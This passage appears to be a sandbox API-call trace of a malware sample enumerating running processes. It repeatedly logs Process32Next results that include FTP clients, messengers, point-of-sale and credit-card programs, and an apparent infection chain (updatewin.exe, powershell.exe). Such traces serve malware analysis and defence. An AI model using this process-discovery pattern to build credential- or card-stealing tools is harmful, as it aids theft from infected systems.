Size=0x64) returned 0x4a464c0 [0129.510] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.510] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0129.511] GetTickCount () returned 0x116f4df [0129.511] GetCurrentThreadId () returned 0x618 [0129.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.511] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0129.512] GetTickCount () returned 0x116f4df [0129.512] GetCurrentThreadId () returned 0x618 [0129.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.512] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0129.513] GetTickCount () returned 0x116f4df [0129.513] GetCurrentThreadId () returned 0x618 [0129.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.513] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0129.515] GetTickCount () returned 0x116f4df [0129.515] GetCurrentThreadId () returned 0x618 [0129.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.515] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0129.516] GetTickCount () returned 0x116f4df [0129.516] GetCurrentThreadId () returned 0x618 [0129.516] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.516] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0129.518] GetTickCount () returned 0x116f4ee [0129.518] GetCurrentThreadId () returned 0x618 [0129.518] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.518] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.518] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0129.519] GetTickCount () returned 0x116f4ee [0129.519] GetCurrentThreadId () returned 0x618 [0129.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.519] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.519] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0129.520] GetTickCount () returned 0x116f4ee [0129.520] GetCurrentThreadId () returned 0x618 [0129.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.520] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0129.521] GetTickCount () returned 0x116f4ee [0129.521] GetCurrentThreadId () returned 0x618 [0129.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.521] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0129.522] GetTickCount () returned 0x116f4ee [0129.522] GetCurrentThreadId () returned 0x618 [0129.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.523] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0129.524] GetTickCount () returned 0x116f4ee [0129.524] GetCurrentThreadId () returned 0x618 [0129.524] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.524] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.524] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0129.525] GetTickCount () returned 0x116f4ee [0129.525] GetCurrentThreadId () returned 0x618 [0129.525] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.525] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.525] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0129.526] GetTickCount () returned 0x116f4ee [0129.526] GetCurrentThreadId () returned 0x618 [0129.526] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.526] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.526] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0129.528] GetTickCount () returned 0x116f4ee [0129.528] GetCurrentThreadId () returned 0x618 [0129.528] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.528] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.528] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0129.529] GetTickCount () returned 0x116f4ee [0129.529] GetCurrentThreadId () returned 0x618 [0129.529] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.529] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.529] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0129.530] GetTickCount () returned 0x116f4ee [0129.530] GetCurrentThreadId () returned 0x618 [0129.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.530] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0129.531] GetTickCount () returned 0x116f4ee [0129.531] GetCurrentThreadId () returned 0x618 [0129.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.532] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0129.533] GetTickCount () returned 0x116f4fe [0129.533] GetCurrentThreadId () returned 0x618 [0129.533] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.533] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.533] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0129.534] GetTickCount () returned 0x116f4fe [0129.534] GetCurrentThreadId () returned 0x618 [0129.534] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.534] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.534] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0129.535] GetTickCount () returned 0x116f4fe [0129.535] GetCurrentThreadId () returned 0x618 [0129.535] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.535] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.535] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0129.536] GetTickCount () returned 0x116f4fe [0129.536] GetCurrentThreadId () returned 0x618 [0129.536] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.536] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.537] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0129.538] GetTickCount () returned 0x116f4fe [0129.538] GetCurrentThreadId () returned 0x618 [0129.538] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.538] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.538] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0129.539] GetTickCount () returned 0x116f4fe [0129.539] GetCurrentThreadId () returned 0x618 [0129.539] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.539] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.539] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0129.540] GetTickCount () returned 0x116f4fe [0129.540] GetCurrentThreadId () returned 0x618 [0129.540] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.540] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.540] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kentucky-phrases-casual.exe")) returned 1 [0129.542] GetTickCount () returned 0x116f4fe [0129.542] GetCurrentThreadId () returned 0x618 [0129.542] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.542] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.542] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="breaking.exe")) returned 1 [0129.543] GetTickCount () returned 0x116f4fe [0129.543] GetCurrentThreadId () returned 0x618 [0129.543] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.543] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.543] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="enforcement_wv_transmitted.exe")) returned 1 [0129.544] GetTickCount () returned 0x116f4fe [0129.544] GetCurrentThreadId () returned 0x618 [0129.544] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.544] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.544] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="friend.exe")) returned 1 [0129.545] GetTickCount () returned 0x116f4fe [0129.545] GetCurrentThreadId () returned 0x618 [0129.545] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.545] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.545] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0129.546] GetTickCount () returned 0x116f4fe [0129.546] GetCurrentThreadId () returned 0x618 [0129.547] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.547] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.547] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0129.548] GetTickCount () returned 0x116f50d [0129.548] GetCurrentThreadId () returned 0x618 [0129.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.548] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.549] GetTickCount () returned 0x116f50d [0129.549] GetCurrentThreadId () returned 0x618 [0129.549] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.549] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.549] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.550] GetTickCount () returned 0x116f50d [0129.550] GetCurrentThreadId () returned 0x618 [0129.550] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.551] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.551] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.552] GetTickCount () returned 0x116f50d [0129.552] GetCurrentThreadId () returned 0x618 [0129.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.552] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.553] GetTickCount () returned 0x116f50d [0129.553] GetCurrentThreadId () returned 0x618 [0129.553] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.553] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.553] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.554] GetTickCount () returned 0x116f50d [0129.554] GetCurrentThreadId () returned 0x618 [0129.554] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.554] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.554] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0xa94, pcPriClassBase=13, dwFlags=0x0, szExeFile="OqRoSnESYXcDITEx.exe")) returned 1 [0129.555] GetTickCount () returned 0x116f50d [0129.555] GetCurrentThreadId () returned 0x618 [0129.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.555] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0129.556] GetTickCount () returned 0x116f50d [0129.556] GetCurrentThreadId () returned 0x618 [0129.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.556] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb10, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0129.557] GetTickCount () returned 0x116f50d [0129.557] GetCurrentThreadId () returned 0x618 [0129.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.557] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0129.558] GetTickCount () returned 0x116f50d [0129.558] GetCurrentThreadId () returned 0x618 [0129.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.558] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xab8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0129.560] GetTickCount () returned 0x116f50d [0129.560] GetCurrentThreadId () returned 0x618 [0129.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.560] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0129.561] GetTickCount () returned 0x116f50d [0129.561] GetCurrentThreadId () returned 0x618 [0129.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.561] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.561] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.562] GetTickCount () returned 0x116f50d [0129.562] GetCurrentThreadId () returned 0x618 [0129.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.562] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4fc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OqRoSnESYXcDITEx.exe")) returned 1 [0129.563] GetTickCount () returned 0x116f50d [0129.563] GetCurrentThreadId () returned 0x618 [0129.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.563] HeapFree 